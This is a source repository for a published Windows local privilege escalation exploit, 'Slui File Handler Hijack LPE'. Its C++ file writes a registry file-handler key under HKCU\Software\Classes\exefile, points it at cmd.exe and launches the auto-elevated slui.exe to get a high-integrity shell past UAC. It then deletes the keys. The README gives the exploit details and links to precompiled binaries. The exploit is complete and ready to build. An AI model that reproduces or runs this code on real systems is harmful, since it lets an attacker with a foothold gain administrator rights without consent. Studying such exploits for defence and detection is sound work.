├── .gitignore ├── SluiFileHandlerHijackLPE ├── SluiFileHandlerHijackLPE.vcxproj.filters ├── SluiFileHandlerHijackLPE.cpp └── SluiFileHandlerHijackLPE.vcxproj ├── LICENSE.md ├── README.md └── SluiFileHandlerHijackLPE.sln /.gitignore: -------------------------------------------------------------------------------- 1 | .vs/ 2 | bin/ 3 | obj/ 4 | Debug/ 5 | Release/ 6 | ipch/ 7 | TestResults/ 8 | *.suo 9 | *.user 10 | *.sdf 11 | *.opensdf 12 | *.opendb 13 | *.VC.db 14 | *.aps 15 | [Tt]humbs.db 16 | *~*.xlsx 17 | *~*.docx 18 | 19 | $Build/ -------------------------------------------------------------------------------- /SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 bytecode77 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Slui File Handler Hijack LPE 2 | 3 | | Exploit Information | | 4 | |:------------------- |:--------------------------------- | 5 | | Date | 15.01.2018 | 6 | | Patched | Windows 10 20H1 (19041) | 7 | | exploit-db | [44830](https://www.exploit-db.com/exploits/44830/) | 8 | | Tested on | Windows 8-10, x86/x64 independent | 9 | 10 | ## Description 11 | 12 | slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking. 13 | 14 | Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution. Due to the registry key being accessible from user mode, an arbitrary executable file can be injected. 15 | 16 | This exploit is generally independent from programming language and bitness, as no DLL injection or privileged file copy is needed. In addition, if default system binaries suffice, file drops can be avoided altogether. 17 | 18 | ## Expected Result 19 | 20 | When everything worked correctly, a cmd.exe should be spawned with high IL. 21 | 22 | ## Downloads 23 | 24 | Compiled binaries: 25 | 26 | [![](http://bytecode77.com/public/fileicons/zip.png) SluiFileHandlerHijackLPE.zip](https://downloads.bytecode77.com/SluiFileHandlerHijackLPE.zip) 27 | (**ZIP Password:** bytecode77) 28 | 29 | ## Project Page 30 | 31 | [![](https://bytecode77.com/public/favicon16.png) bytecode77.com/slui-file-handler-hijack-privilege-escalation](https://bytecode77.com/slui-file-handler-hijack-privilege-escalation) -------------------------------------------------------------------------------- /SluiFileHandlerHijackLPE.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27130.2010 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SluiFileHandlerHijackLPE", "SluiFileHandlerHijackLPE\SluiFileHandlerHijackLPE.vcxproj", "{CF9EE248-E537-43C2-8886-C54E51430F02}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {CF9EE248-E537-43C2-8886-C54E51430F02}.Debug|x64.ActiveCfg = Debug|x64 17 | {CF9EE248-E537-43C2-8886-C54E51430F02}.Debug|x64.Build.0 = Debug|x64 18 | {CF9EE248-E537-43C2-8886-C54E51430F02}.Debug|x86.ActiveCfg = Debug|Win32 19 | {CF9EE248-E537-43C2-8886-C54E51430F02}.Debug|x86.Build.0 = Debug|Win32 20 | {CF9EE248-E537-43C2-8886-C54E51430F02}.Release|x64.ActiveCfg = Release|x64 21 | {CF9EE248-E537-43C2-8886-C54E51430F02}.Release|x64.Build.0 = Release|x64 22 | {CF9EE248-E537-43C2-8886-C54E51430F02}.Release|x86.ActiveCfg = Release|Win32 23 | {CF9EE248-E537-43C2-8886-C54E51430F02}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {AA468A55-1A3A-4469-A776-52B7578A0E7A} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ╓──────────────────────────────────────────────────────────────────────────────────────╖ 3 | * ║ ║ 4 | * ║ Slui File Handler Hijack UAC Bypass Local Privilege Escalation ║ 5 | * ║ ║ 6 | * ║ Discovered by bytecode77 (https://bytecode77.com) ║ 7 | * ║ ║ 8 | * ║ Full Download: ║ 9 | * ║ https://bytecode77.com/slui-file-handler-hijack-privilege-escalation ║ 10 | * ║ ║ 11 | * ╟──────────────────────────────────────────────────────────────────────────────────────╢ 12 | * ║ ║ 13 | * ║ slui.exe is an auto-elevated binary that is vulnerable to file handler ║ 14 | * ║ hijacking. ║ 15 | * ║ ║ 16 | * ║ Read access to HKCU\Software\Classes\exefile\shell\open is performed upon ║ 17 | * ║ execution. Due to the registry key being accessible from user mode, an arbitrary ║ 18 | * ║ executable file can be provided. ║ 19 | * ║ ║ 20 | * ║ This exploit is generally independent from programming language and bitness, as ║ 21 | * ║ no DLL injection or privileged file copy is needed. In addition, if default ║ 22 | * ║ system binaries suffice, file drops can be avoided altogether. ║ 23 | * ║ ║ 24 | * ╙──────────────────────────────────────────────────────────────────────────────────────╜ 25 | */ 26 | 27 | #include 28 | #include 29 | using namespace std; 30 | 31 | void CreateRegistryKey(HKEY key, wstring path, wstring name); 32 | void DeleteRegistryKey(HKEY key, wstring path, wstring name); 33 | void SetRegistryValue(HKEY key, wstring path, wstring name, wstring value); 34 | 35 | int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) 36 | { 37 | // Create Class "exefile" in HKCU 38 | 39 | // HKEY_CURRENT_USER 40 | // Software 41 | // Classes 42 | // exefile 43 | // shell 44 | // open 45 | // command 46 | // @=Payload <-- cmd.exe is used here, can be any executable 47 | 48 | // Create registry tree 49 | CreateRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes", L"exefile"); 50 | CreateRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile", L"shell"); 51 | CreateRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell", L"open"); 52 | CreateRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell\\open", L"command"); 53 | 54 | // Set payload to cmd.exe 55 | // Any executable can be used. File drops can, however, be avoided completely if system binaries suffice. 56 | SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell\\open\\command", L"", L"C:\\Windows\\System32\\cmd.exe"); 57 | 58 | // Start slui.exe with "runas" verb 59 | ShellExecuteW(NULL, L"runas", L"C:\\Windows\\System32\\slui.exe", NULL, NULL, SW_SHOWNORMAL); 60 | 61 | // Wait some time until it finished loading 62 | Sleep(1000); 63 | 64 | // Delete registry keys, but only from \Software\Classes\exefile\shell to not interfere with other application handlers 65 | DeleteRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell\\open", L"command"); 66 | DeleteRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell", L"open"); 67 | return 0; 68 | } 69 | 70 | 71 | 72 | void CreateRegistryKey(HKEY key, wstring path, wstring name) 73 | { 74 | HKEY hKey; 75 | if (RegOpenKeyExW(key, path.c_str(), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS && hKey != NULL) 76 | { 77 | HKEY hKeyResult; 78 | RegCreateKeyW(hKey, name.c_str(), &hKeyResult); 79 | RegCloseKey(hKey); 80 | } 81 | } 82 | void DeleteRegistryKey(HKEY key, wstring path, wstring name) 83 | { 84 | HKEY hKey; 85 | if (RegOpenKeyExW(key, path.c_str(), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS && hKey != NULL) 86 | { 87 | RegDeleteKeyW(hKey, name.c_str()); 88 | RegCloseKey(hKey); 89 | } 90 | } 91 | void SetRegistryValue(HKEY key, wstring path, wstring name, wstring value) 92 | { 93 | HKEY hKey; 94 | if (RegOpenKeyExW(key, path.c_str(), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS && hKey != NULL) 95 | { 96 | RegSetValueExW(hKey, name.c_str(), 0, REG_SZ, (BYTE*)value.c_str(), ((DWORD)wcslen(value.c_str()) + 1) * sizeof(wchar_t)); 97 | RegCloseKey(hKey); 98 | } 99 | } -------------------------------------------------------------------------------- /SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {CF9EE248-E537-43C2-8886-C54E51430F02} 24 | SluiFileHandlerHijackLPE 25 | 10.0.16299.0 26 | 27 | 28 | 29 | Application 30 | true 31 | v141 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v141 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v141 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v141 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | Disabled 77 | true 78 | true 79 | MultiThreadedDebug 80 | 81 | 82 | mkdir "$(SolutionDir)$Build" 83 | mkdir "$(SolutionDir)$Build\$(PlatformShortName)" 84 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Build\$(PlatformShortName)" 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | true 92 | true 93 | MultiThreadedDebug 94 | 95 | 96 | mkdir "$(SolutionDir)$Build" 97 | mkdir "$(SolutionDir)$Build\$(PlatformShortName)" 98 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Build\$(PlatformShortName)" 99 | 100 | 101 | 102 | 103 | Level3 104 | MaxSpeed 105 | true 106 | true 107 | true 108 | true 109 | MultiThreaded 110 | 111 | 112 | true 113 | true 114 | 115 | 116 | mkdir "$(SolutionDir)$Build" 117 | mkdir "$(SolutionDir)$Build\$(PlatformShortName)" 118 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Build\$(PlatformShortName)" 119 | 120 | 121 | 122 | 123 | Level3 124 | MaxSpeed 125 | true 126 | true 127 | true 128 | true 129 | MultiThreaded 130 | 131 | 132 | true 133 | true 134 | 135 | 136 | mkdir "$(SolutionDir)$Build" 137 | mkdir "$(SolutionDir)$Build\$(PlatformShortName)" 138 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Build\$(PlatformShortName)" 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | --------------------------------------------------------------------------------